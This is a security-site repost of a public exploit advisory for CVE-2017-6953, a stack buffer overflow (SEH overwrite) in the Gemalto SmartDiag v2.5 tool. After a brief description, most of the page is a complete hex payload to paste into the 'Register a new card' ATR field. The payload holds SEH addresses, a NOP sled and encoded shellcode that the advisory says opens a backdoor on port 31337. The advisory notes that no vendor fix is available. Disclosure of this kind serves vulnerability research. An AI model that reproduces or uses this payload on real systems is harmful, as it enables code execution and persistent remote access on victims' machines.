首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)
来源:https://www.linkedin.com/in/majidalqabandi 作者:Alqabandi 发布时间:2017-05-09  
# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow
- SEH Overwrite
# Date: 16-03-2017
# Software Link: http://support.gemalto.com/index.php?id=download_tools
# Exploit Author: Majid Alqabandi
# Contact: https://www.linkedin.com/in/majidalqabandi/
# CVE: CVE-2017-6953
# Category: Local - command execution - Buffer Overflow - SEH Overwrite.
 
1. Description
SymDiag.exe is vulnerable to buffer overflow, SEH overwrite.
When trying to (Register a new card), Input fields are vulnerable to stack
overflow attack which leads to code execution and other possible security
threats.
 
 
 
2. Proof of Concept
 
The following PoC is provided code will:
- Exploit the vulnerability.
- Execute shell code.
- Create a backdoor on port 31337.
 
To exploit, start SmartDiag.exe tool, choose "Register a new card", on the
ATR use the following payload (Tested on Win7x64 & Win8x64 - SmartDiag
v2.5):
 
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
52834000528340005283400052834000572b0410477f40008c214100f494
400041ed40003b4140003552011078ab0110010000009cf2021000100000
328b031040000000d02203100120400026e6400090909090e2f500109090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
9090909090909090ddc1d97424f4bbc4aa698a5833c9b15683e8fc315814
0358d0489c7630055f87c076e962f1a48de7a378c5aa4ff28b5ec4760450
6d3c725f6ef0ba33ac92464ee0747681f575bffcf524688aa7d81dce7bd8
f144c3a2749ab71876cb671630f30c70e102c162dd4d6e50954fa6a8567e
8667694e0b79ad69f30cc5898e161ef3549283531f046065ccd3e369b990
ac6d3c74c78ab57b081b8d5f8c4756c1952d39fec68ae65a8c39f3ddcf55
30d0efa55e638397c1df0b948af9ccdba1be432249bf4ae11defe4c01d64
f5edc82ba541a28b152212647cad4d947f67f892b153a974b06337ec3d85
adfe6b1d593d4896fe3eba8a57a9f2c46fd602c3dc7baa8496976fb4a9bd
c7bf92569dd151c6a2fb016b3060d1e2293f86a39c36425e86e070a35eca
3078a3d5b90d9ff1a9cb20be9d8376684b6221da253c9eb4a1b9ec06b7c5
38f15777954468b8714111a4e1aec86c11e550c4baa00154a752fc9bded0
f46325c87d61614e6e1bfa3b9088fb69AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 
 
 
3. Solution:
Vendor has been informed and confirmed the issue, no fix is available yet
from vendor.
 
[推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Crypttech CryptoLog Remote Cod
·RPCBind / libtirpc - Denial of
·Safari 10.0.3 - 'JSC::CachedCa
·Veritas Netbackup 8.0 File Wri
·WordPress 4.6 - Unauthenticate
·LogRhythm Network Monitor - Au
·Serviio PRO 1.8 DLNA Media Str
·Oracle GoldenGate 12.1.2.0.0 -
·Serviio PRO 1.8 DLNA Media Str
·wolfSSL 3.10.2 - x509 Certific
·Serviio PRO 1.8 DLNA Media Str
·ASUS Routers CSRF / Informatio
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved